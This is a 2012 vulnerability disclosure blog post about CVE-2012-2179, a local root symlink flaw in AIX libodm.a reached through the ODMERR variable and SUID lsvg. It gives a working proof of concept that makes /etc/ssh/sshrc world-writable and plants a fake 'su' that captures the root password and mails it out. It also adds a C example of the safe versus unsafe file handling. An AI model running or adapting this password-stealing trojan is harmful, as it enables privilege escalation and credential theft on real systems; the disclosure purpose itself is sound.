Archive for July, 2012

CVE-2012-2179: lsvg(1) AIX61/71 – libodm.a vulnerable due to the ODMERR env

Thursday, July 12th, 2012

This is a new local attack for at least AIX 6.1 / 7.1, or at least there was enough time for anyone seriously considering security to patch their systems (IBM released info on 2012-06-22, today is 2012-07-12) … This is a typical arbitrary file overwrite symlink vulnerability, caused by a libodm.a bug, that gives local root. libodm.a (in this case used by the SUID lsvg) performs a getenv("ODMERR"), an undocumented environment variable. If it is set, it triggers debug code that dumps the debug log messages generated at runtime by libodm.a, always to the same file: ODMTRACE0 (or ODMTRACE1, etc.) in the current runtime directory (seems to be related to getcwd()). Proof:

guest@XXX:# oslevel -s
7100-00-03-1115
guest@XXX:# export ODMERR=1
guest@XXX:# ln -s /etc/ssh/sshrc ODMTRACE0
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 -> /etc/ssh/sshrc
guest@XXX:# umask 0000
guest@XXX:# lsvg
rootvg
appvg
guest@XXX:# ls -l
total 0
lrwxrwxrwx    1 install  staff            14 Dec 22 05:42 ODMTRACE0 -> /etc/ssh/sshrc
guest@XXX:# head -3 ODMTRACE0
 __odm_initfini_init: Start
 __odm_initfini_init: End
 odm_set_path: Start
guest@XXX:# ls -l /etc/ssh/sshrc
-rw-rw-rw-    1 root     staff          7332 Dec 22 05:42 /etc/ssh/sshrc
guest@XXX:#
guest@XXX:# vi /etc/ssh/sshrc
# a lot of typing
guest@XXX:# cat /etc/ssh/sshrc
#!/bin/sh
# proof of concept for lsvg(1) AIX61/71 0-day exploit, 22/12/2011, vnull
#
# /etc/environment usually sets PATH from scratch so we have to
# cheat via ~/.profile which is read by user's shell at later stage
#

mkdir /tmp/$$
cat > /tmp/$$/su << EOF
#!/bin/bash
#this would be a su backdoor sendming email or transmiting pw over dns...
echo -e "root's Password: \c"
stty -echo
read PW
stty echo
echo
#echo your PW is \$PW
echo \$USER \$HOSTNAME \$PW | mail -s cookie your@email.com >
/dev/null 2>&1
echo '[compat]: 3004-300 You entered an invalid login name or password.'
echo
echo '3004-501 Cannot su to "root" : Authentication is denied.'
rm -f /tmp/$$/su
exit 0
EOF
chmod 755 /tmp/$$/su

cat >> ~/.profile << EOF
export PATH=/tmp/$$:$PATH
EOF

guest@XXX:#

How does it work? If the above attack is performed and somebody else logs in remotely using ssh (root or just a simple user), then the contents of /etc/ssh/sshrc are executed (by sshd) with that user's privilege level. In this case PATH is altered to hijack "su" executions and potentially obtain the password. This could also be adapted, e.g., to catch the "sudo" password too.

Potential workaround: drop the SUID bit from all binaries linked to libodm.a (yes, I find it kind of hard due to the need to drop SUID even from lsvg, which may break a lot of IBM/3rd-party software, especially some agents using commands such as lsvg for monitoring).

Fixed via CVE-2012-2179; more info here: http://aix.software.ibm.com/aix/efixes/security/libodm_advisory.asc
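The bug class described above, next to a hardened form, as an added example (this is not libodm source and not IBM's fix). The function names open_trace_unsafe, open_trace_safe and symlink_created_target are hypothetical, and the scratch directory under /tmp is constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical opener, not libodm code: env switch, predictable name, follows symlinks. */
int open_trace_unsafe(const char *name) {
    if (getenv("ODMERR") == NULL) return -1;
    return open(name, O_WRONLY | O_CREAT | O_APPEND, 0666); /* mode obeys umask */
}

/* Hardened: no tracing when set-uid/set-gid, no symlinks, owner-only mode. */
int open_trace_safe(const char *name) {
    struct stat st;
    if (getenv("ODMERR") == NULL) return -1;
    if (getuid() != geteuid() || getgid() != getegid()) return -1;
    int fd = open(name, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    if (fd < 0) return -1; /* ELOOP when name is a symlink */
    /* O_NOFOLLOW does not stop hard links, so check what was really opened. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: a dangling symlink named ODMTRACE0 in a scratch dir.
 * Returns 1 if the opener created the symlink's target, 0 if not, -1 on error. */
int symlink_created_target(int (*opener)(const char *)) {
    char dir[] = "/tmp/odmdemoXXXXXX", lnk[64], target[64];
    struct stat st;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(lnk, sizeof lnk, "%s/ODMTRACE0", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    setenv("ODMERR", "1", 1);
    if (symlink(target, lnk) != 0) return -1;
    int fd = opener(lnk);
    if (fd >= 0) close(fd);
    int created = (stat(target, &st) == 0);
    unlink(target); unlink(lnk); rmdir(dir);
    return created;
}
int main(void) {
    printf("unsafe created target: %d\n", symlink_created_target(open_trace_unsafe));
    printf("safe created target:   %d\n", symlink_created_target(open_trace_safe));
    return 0;
}
```

The privilege check is what keeps an environment variable set by the caller from steering a SUID program into debug code at all; the O_NOFOLLOW and fstat() checks only cover the case where tracing is legitimately enabled.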

Still, IBM AIX doesn't come with proper hardened protection against /tmp races, as mentioned in the previous blog entry about CVE-2011-1384. Timeline: almost 180 days to fix for IBM.

BTW: This proof of concept could be easily adapted to give instant root (as you can create any file that does not exist), but I'm not going to disclose weaponized versions.

-J.